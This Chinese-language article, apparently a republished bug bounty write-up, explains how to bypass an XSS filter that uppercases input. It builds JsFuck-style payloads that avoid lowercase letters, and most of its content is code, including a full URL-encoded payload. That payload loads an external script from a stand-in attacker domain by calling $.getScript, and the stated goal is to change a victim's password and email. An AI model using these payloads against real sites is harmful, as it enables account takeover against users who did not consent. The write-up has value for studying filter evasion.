如何繞過像PRO這樣的XSS過濾器

本篇文章為大家展示了如何繞過像PRO這樣的XSS過濾器，內(nèi)容簡明扼要并且容易理解，絕對能使你眼前一亮，通過這篇文章的詳細(xì)介紹希望你能有所收獲。

JavaScript代碼中如果存在代碼注入漏洞的話，那確實是一個令人頭疼的問題，由于這個項目并不是我們?yōu)槠髽I(yè)環(huán)境做的滲透測試項目，因此我們可以直接將技術(shù)細(xì)節(jié)公布給大家。

簡而言之，我們在某網(wǎng)站上發(fā)現(xiàn)了一個安全漏洞，經(jīng)過一段時間的代碼分析之后，我們成功發(fā)現(xiàn)了一個存在XSS漏洞的節(jié)點：

http://website.com/dir/subdir

在該節(jié)點的JavaScript代碼中，有如下代碼：

function("/DIR/SUBDIR",params);

使用Burp Suite掃描之后，我們發(fā)現(xiàn)在URL結(jié)尾添加“-alert(1)-”（http://website.com/dir/subdir/”-alert(1)-”）將能夠反射XSS，瀏覽器會告訴我們“unable to find function ALERT(1)”：

那么接下來，我們需要測試服務(wù)器到底過濾掉了什么，比如說是“</script>”、“//”、“\”還是“.”。

尋找可用的Payload

我們也尋找到了一些解決方案，而且都跟jsfuck.com有關(guān)。

當(dāng)然了，在這個站點我們也可以執(zhí)行一次“alert(1)”，但這只是低危的XSS，我們想要將該漏洞提升為高?；驀?yán)重漏洞。為了實現(xiàn)這個目標(biāo)，我們將需要加載一個外部JS文件，并且能夠在不需要任何用戶交互的情況下執(zhí)行任意Web行為。

下圖顯示的是一個WordPress Payload，我們的目標(biāo)是在目標(biāo)網(wǎng)站中加載要一個外部JS文件，并修改賬號密碼以及郵箱：

制作JsFuck Payload，在JsFuck代碼中，簡單地“alert(1)”會被轉(zhuǎn)換為：

"-%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%5B(%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%5D((!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D)()(%2B!!%5B%5D)-"

如果我想要實現(xiàn)“alert(document.cookie)”，那么整個JsFuck代碼估計要到13000多個字符了。我發(fā)現(xiàn)，只要字符超過2500-2700個之后，目標(biāo)站點的服務(wù)器就會返回“錯誤400”。

接下來，我們研究一下JsFuck的工作機(jī)制：

const SIMPLE = {    'false':      '![]',    'true':       '!0',    'undefined':  '0[0]',    'NaN':        '+[!0]',    'Infinity':   '+(+!0+(!0+[])[!0+!0+!0]+[+!0]+[0]+[0]+[0])' // +"1e1000"  };const CONSTRUCTORS = {    'Array':    '[]',    'Number':   '(+0)',    'String':   '([]+[])',    'Boolean':  '(!0)',    'Function': '[]["fill"]',    'RegExp':   'Function("return/"+0+"/")()'  };const MAPPING = {    'a':   '(false+"")[1]',    'b':   '([]["entries"]()+"")[2]',    'c':   '([]["fill"]+"")[3]',    'd':   '(undefined+"")[2]',    'e':   '(true+"")[3]',    'f':   '(false+"")[0]',    'g':   '(false+[0]+String)[20]',    'h':   '(+(101))["to"+String["name"]](21)[1]',    'i':   '([false]+undefined)[10]',    'j':   '([]["entries"]()+"")[3]',    'k':   '(+(20))["to"+String["name"]](21)',    'l':   '(false+"")[2]',    'm':   '(Number+"")[11]',    'n':   '(undefined+"")[1]',    'o':   '(true+[]["fill"])[10]','p':   '(+(211))["to"+String["name"]](31)[1]',

然后，在Chrome中執(zhí)行部分代碼：

一般來說，我們可以直接用不同類型的變量來“包裝”這些字符串，所以我們可以使用小寫字符來存儲類似false、true、undefined、NaN和Infinity之類的關(guān)鍵字字符串。

接下來，我想要避免使用小寫字符：

á=![]; //falseé=!![]; //true í=[][[]]; //undefinedó=+[![]]; //NaNSI=+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]]+[+[]]);// InfinityST=([]+[]); //ü=(+[]);A=(á+"")[1];D=(í+"")[2];E=(é+"")[3];F=(á+"")[0];G=[![]+[+[]]+[[]+[]][+[]][[![]+{}][+[]][+!+[]+[+[]]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[![]+{}][+[]][+!+[]+[+[]]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]][+[]][!+[]+!+[]+[+[]]];I=([á]+í)[10];L=(á+"")[2];T=(é+"")[0];O=(é+[][F+I+L+L])[10];R=(é+"")[1];N=(í+"")[1];M=(+(208))[T+O+"S"+T+R+I+N+G](31)[1];P=(+(211))[T+O+"S"+T+R+I+N+G](31)[1];S=(á+"")[3];U=(í+"")[0];V=(+(31))[T+O+"S"+T+R+I+N+G](32);X=(+(101))[T+O+"S"+T+R+I+N+G](34)[1];Y=(ó+[SI])[10];Z=(+(35))[T+O+"S"+T+R+I+N+G](36);C=([][F+I+L+L]+"")[3];H=(+(101))[T+O+"S"+T+R+I+N+G](21)[1];K=(+(20))[T+O+"S"+T+R+I+N+G](21);W=(+(32))[T+O+"S"+T+R+I+N+G](33);J=([][E+N+T+R+I+E+S]()+"")[3];B=([][E+N+T+R+I+E+S]()+"")[2];

當(dāng)然了，我還需要使用到“.”和“/”，這里我可以利用浮點值1.1e+101來得到“.”：

非常好，我們要的“.”已經(jīng)有了，現(xiàn)在還差“/”和“g”，考慮到大寫字母過濾器的存在，我打算使用JsFuck，因此不得不犧牲1200個字符，不過這個Payload目前也只有500-800個字符，離最終的上限還有一段距離。

既然我們已經(jīng)得到了所有需要的字符，那么接下來就是執(zhí)行我們的Payload了：

[][F+I+L+L][C+O+N+S+T+R+U+C+T+O+R](A+L+E+R+T(1))();

上述這段JsFuck代碼會被翻譯成“fill.constructor(alert(1))”，并且讓我們的JavaScript文件全部以大寫字母的形式執(zhí)行，非常好！

我祈禱我們的目標(biāo)站點使用的是JQuery，并且在頁面HTML代碼的結(jié)尾進(jìn)行加載，那么在注入完成之后，并且等待三秒鐘加載所有的依賴組件，最終執(zhí)行$.getScript來加載我們的外部JS文件。

[][F+I+L+L][C+O+N+S+T+R+U+C+T+O+R](S+E+T+"T"+I+M+E+O+U+T+"("+F+U+N+C+T+I+O+N+"(){ $"+DOT+G+E+T+"S"+C+R+I+P+T+"('"+SLA+SLA+"test"+SLA+"test')(); }, 3000);")();

等待了三秒鐘之后，我們成功拿到了test/test請求?。〗酉聛?，使用URL編碼對Payload進(jìn)行編碼處理，最終的Payload如下所示：

%3B%C3%81=![]%3B%C3%89=!![]%3B%C3%8D=[][[]]%3B%C3%93=%2B[![]]%3BSI=%2B(%2B!%2B[]%2B(!%2B[]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B[%2B!%2B[]]%2B[%2B[]]%2B[%2B[]]%2B[%2B[]])%3BST=([]%2B[])%3B%C3%9C=(%2B[])%3BA=(%C3%81%2B%22%22)[1]%3BD%20=%20(%C3%8D%2B%22%22)[2]%3BE%20=%20(%C3%89%2B%22%22)[3]%3BF%20=%20(%C3%81%2B%22%22)[0]%3BG%20=%20[![]%2B[%2B[]]%2B[[]%2B[]][%2B[]][[![]%2B%7B%7D][%2B[]][%2B!%2B[]%2B[%2B[]]]%2B[[]%2B%7B%7D][%2B[]][%2B!%2B[]]%2B[[][[]]%2B[]][%2B[]][%2B!%2B[]]%2B[![]%2B[]][%2B[]][!%2B[]%2B!%2B[]%2B!%2B[]]%2B[!![]%2B[]][%2B[]][%2B[]]%2B[!![]%2B[]][%2B[]][%2B!%2B[]]%2B[[][[]]%2B[]][%2B[]][%2B[]]%2B[![]%2B%7B%7D][%2B[]][%2B!%2B[]%2B[%2B[]]]%2B[!![]%2B[]][%2B[]][%2B[]]%2B[[]%2B%7B%7D][%2B[]][%2B!%2B[]]%2B[!![]%2B[]][%2B[]][%2B!%2B[]]]][%2B[]][!%2B[]%2B!%2B[]%2B[%2B[]]]%3BI%20=%20([%C3%81]%2B%C3%8D)[10]%3BL%20=%20(%C3%81%2B%22%22)[2]%3BT%20=%20(%C3%89%2B%22%22)[0]%3BO%20=%20(%C3%89%2B[][F%2BI%2BL%2BL])[10]%3BR%20=%20(%C3%89%2B%22%22)[1]%3BN%20=%20(%C3%8D%2B%22%22)[1]%3BM%20=%20(%2B(208))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](31)[1]%3BP%20=%20(%2B(211))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](31)[1]%3BS%20=%20(%C3%81%2B%22%22)[3]%3BU%20=%20(%C3%8D%2B%22%22)[0]%3BV%20=%20(%2B(31))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](32)%3BX%20=%20(%2B(101))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](34)[1]%3BY%20=%20(%C3%93%2B[SI])[10]%3BZ%20=%20(%2B(35))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](36)%3BC%20=%20([][F%2BI%2BL%2BL]%2B%22%22)[3]%3BH%20=%20(%2B(101))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](21)[1]%3BK%20=%20(%2B(20))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](21)%3BW%20=%20(%2B(32))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](33)%3BJ%20=%20([][E%2BN%2BT%2BR%2BI%2BE%2BS]()%2B%22%22)[3]%3BB%20=%20([][E%2BN%2BT%2BR%2BI%2BE%2BS]()%2B%22%22)[2]%3BDOT%20=%20(%2B(%2211E100%22)%2B[])[1]%3BSLA=(![]%2B[%2B![]])[([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B(!![]%2B[])[%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B([][(![]%2B[])[%2B[]]%2B([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B(!![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B!%2B[]]]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]]()[%2B!%2B[]%2B[%2B[]]]%3B[][F%2BI%2BL%2BL][C%2BO%2BN%2BS%2BT%2BR%2BU%2BC%2BT%2BO%2BR](S%2BE%2BT%2B%22T%22%2BI%2BM%2BE%2BO%2BU%2BT%2B%22(%22%2BF%2BU%2BN%2BC%2BT%2BI%2BO%2BN%2B%22()%7B%20$%22%2BDOT%2BG%2BE%2BT%2B%22S%22%2BC%2BR%2BI%2BP%2BT%2B%22('%22%2BSLA%2BSLA%2B%22BADASSDOMAIN%22%2BDOT%2B%22COM%22%2BSLA%2B%22BADASSURL')()%3B%20%7D,%203000)%3B%22)()%3B(%22

我們成功地在目標(biāo)站點中加載了外部JS文件，并且我們的外部JS文件可以修改目標(biāo)賬號的用戶密碼！

總結(jié)

該漏洞可以允許攻擊者實現(xiàn)賬戶接管，并將低危的XSS漏洞提升為高危漏洞，而該漏洞也拿到了1000美金的漏洞獎勵。

上述內(nèi)容就是如何繞過像PRO這樣的XSS過濾器，你們學(xué)到知識或技能了嗎？如果還想學(xué)到更多技能或者豐富自己的知識儲備，歡迎關(guān)注億速云行業(yè)資訊頻道。